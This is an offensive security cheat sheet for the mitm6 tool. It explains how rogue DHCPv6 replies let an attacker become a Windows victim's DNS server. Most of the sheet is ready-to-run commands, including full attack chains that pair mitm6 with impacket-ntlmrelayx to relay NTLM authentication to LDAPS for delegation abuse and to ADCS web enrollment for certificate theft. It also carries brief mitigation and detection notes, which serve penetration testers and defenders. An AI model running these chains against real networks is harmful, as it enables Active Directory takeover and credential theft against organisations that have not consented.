MITM6
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
mitm6 abuses default IPv6 behaviour in Windows networks: it replies to DHCPv6 requests, becomes the victim's DNS server, and lets an attacker intercept/relay traffic (classically WPAD -> NTLM relay to LDAP/ADCS). A staple front-half of modern relay chains. Authorized engagements only.
CORE CONCEPT#
# Windows prefers IPv6 and auto-requests a DHCPv6 lease # mitm6 answers -> becomes primary DNS for the victim # Victim then resolves attacker-controlled names (e.g. WPAD) # Combine with ntlmrelayx to relay coerced auth to LDAP/ADCS # Pairs directly with the NTLM-RELAY sheet
BASIC USAGE#
mitm6 -d corp.lu # Target a domain (DNS spoof) mitm6 -i eth0 -d corp.lu # Specify interface mitm6 -d corp.lu -v # Verbose sudo mitm6 -d corp.lu # Needs root (raw sockets)
SCOPING (BE SURGICAL)#
mitm6 -d corp.lu --host-allowlist host1 host2 # Only spoof these hosts
mitm6 -d corp.lu --host-denylist dc01 # Never spoof these
mitm6 -d corp.lu --domain-allowlist wpad.corp.lu
# Only answer these names
mitm6 -d corp.lu --ignore-nofqdn # Ignore non-FQDN queries
# Scoping is important: unrestricted mitm6 can disrupt a whole subnet
TIMING / BEHAVIOUR#
mitm6 -d corp.lu -hw 5 # DHCPv6 handshake wait mitm6 -d corp.lu --relay <target> # Relay hint (older flag) # Leave mitm6 running while ntlmrelayx handles inbound auth
FULL CHAIN (WITH NTLMRELAYX)#
# Terminal 1 - relay to LDAPS for RBCD / delegate access: impacket-ntlmrelayx -6 -t ldaps://<dc> -wh wpad.corp.lu \ --delegate-access -smb2support # Terminal 2 - poison IPv6/DNS: sudo mitm6 -d corp.lu # -wh sets the WPAD host; -6 tells ntlmrelayx to listen on IPv6 # ESC8 variant - relay coerced auth to ADCS web enrollment: impacket-ntlmrelayx -6 -t http://<ca>/certsrv/certfnsh.asp \ -wh wpad.corp.lu --adcs --template DomainController -smb2support sudo mitm6 -d corp.lu
MITIGATIONS (DEFENSIVE)#
# - Disable IPv6 if unused, OR block rogue DHCPv6 (RA Guard / # DHCPv6 Guard on switches) # - Disable WPAD (GPO) and set the WPAD DNS entry to a real host # - Enforce LDAP signing + channel binding (kills the LDAP relay) # - Enable EPA on ADCS web enrollment (kills ESC8) # - Monitor for unexpected DHCPv6 servers / IPv6 DNS changes
EXAMPLES#
# Scoped IPv6 takeover feeding an LDAPS relay for RBCD impacket-ntlmrelayx -6 -t ldaps://dc.corp.lu -wh wpad.corp.lu \ --delegate-access -smb2support sudo mitm6 -d corp.lu --host-allowlist ws01.corp.lu # IPv6 -> ADCS ESC8 certificate theft chain impacket-ntlmrelayx -6 -t http://ca.corp.lu/certsrv/certfnsh.asp \ -wh wpad.corp.lu --adcs --template DomainController -smb2support sudo mitm6 -d corp.lu
NOTES#
- mitm6 is the coercion front-end; ntlmrelayx does the actual relay - always run them together (-6 and -wh on ntlmrelayx) - SCOPE IT: use --host-allowlist/--domain-allowlist on production FS networks to avoid broad DNS disruption - Reboots/lease renewals re-trigger spoofing; effect is not instant - Detection: rogue DHCPv6 server, sudden IPv6 DNS assignment, WPAD lookups to unexpected hosts (see DEFENDER-KQL / SENTINEL-KQL sheets) - Pairs with NTLM-RELAY.txt (relay targets, ESC8) and LDAP-ENUM.txt